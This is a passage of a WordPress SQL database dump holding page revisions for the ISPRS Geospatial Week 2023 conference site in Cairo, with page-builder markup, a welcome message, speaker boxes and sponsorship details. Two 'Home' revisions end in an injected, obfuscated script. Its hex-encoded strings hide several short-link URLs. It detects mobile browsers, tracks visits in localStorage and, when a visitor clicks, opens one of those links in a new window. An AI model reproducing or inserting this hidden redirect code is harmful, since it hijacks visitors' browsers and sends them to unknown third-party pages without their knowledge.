Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 12:22:52','2022-10-20 12:22:52','',2167,'https://gsw2023.com/?p=2917',0,'revision','',0),
(2918,1,'2022-10-20 12:23:43','2022-10-20 12:23:43','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 12:23:43','2022-10-20 12:23:43','',2167,'https://gsw2023.com/?p=2918',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(2920,1,'2022-10-26 12:03:42','2022-10-26 12:03:42','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a 